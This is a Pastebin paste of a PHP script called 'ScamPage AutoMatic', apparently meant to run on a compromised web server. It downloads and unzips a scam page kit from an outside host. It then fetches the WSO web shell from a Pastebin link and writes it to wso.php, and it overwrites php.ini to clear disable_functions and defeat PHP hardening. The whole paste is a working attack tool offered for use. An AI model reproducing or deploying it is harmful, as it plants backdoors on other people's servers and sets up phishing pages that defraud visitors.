Advertisement
ustadcage_48

ScamPage AutoMatic

Sep 17th, 2016
471
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.65 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
  2. "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
  3. <head>
  4. <link href='http://fonts.googleapis.com/css?family=Prompt' rel='stylesheet' type='text/css'/>
  5. <title>.. xSpaMMer 0x01 ..</title>
  6. <style>body, input, textarea {font-family:Prompt;word-wrap:break-word;} input, textarea { height:100px; width:90%; -moz-border-radius: 9px;-webkit-border-radius:9px;border-radius:9px;border:1px solid #000;padding:4px;margin:none; } a {text-decoration:none;color:green;} </style>
  7. </head>
  8. <body>
  9. <center>
  10. ScamPage AutoMatic<br>
  11. <?php
  12. // creator UstadCage_48
  13. $url = "http://diavenged.mywapblog.com/files/0.zip";
  14. $file = "0.zip";
  15. if(copy($url,$file))
  16. {
  17. $suck = "<font color=green>OK</font>";
  18. $sp = "<font color=green><a href='0/'>Klik Di Sini !</a></font>";
  19. }else{
  20. $suck = "<font color=red>ERROR</font>";
  21. $sp = "ScamPage Gagal !";
  22. }
  23. // wso
  24. $wso = file_get_contents('http://pastebin.com/raw/ddwqvhYR');
  25. $wso1 = fopen('wso.php', 'w');
  26. if(fwrite($wso1,$wso)){
  27. $wso2 = "<a href='wso.php'>Klik Di Sini !</a>";
  28. } else {
  29. $wso2 = "Gagal Buat Shell WSO";
  30. }
  31. fclose($wso1);
  32. // Disable functions
  33. $ds = @ini_get("disable_functions");
  34. $dis = (!empty($ds)) ? "<font color='red'>GAGAL</font>" : "<font color='green'>OK</font>";
  35. // bypass
  36. $by = "disable_functions = none";
  37. $byy = fopen('php.ini', 'w');
  38. fwrite($byy,$by);
  39. fclose($byy);
  40. // Command
  41. $sh = "unzip 0.zip";
  42. if ($sh) print '<textarea>' . $sh . "
  43. " . `$sh` . '</textarea>';
  44.  
  45. ?>
  46. ScamPage <?=$suck;?> !<br>
  47. [ <?=$sp;?> ]<br>
  48. Disable Functions <?=$dis;?><br>
  49. Shell Wso ?<br>
  50. [ <?=$wso2;?> ]
  51. <br>Created By UstadCage_48
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement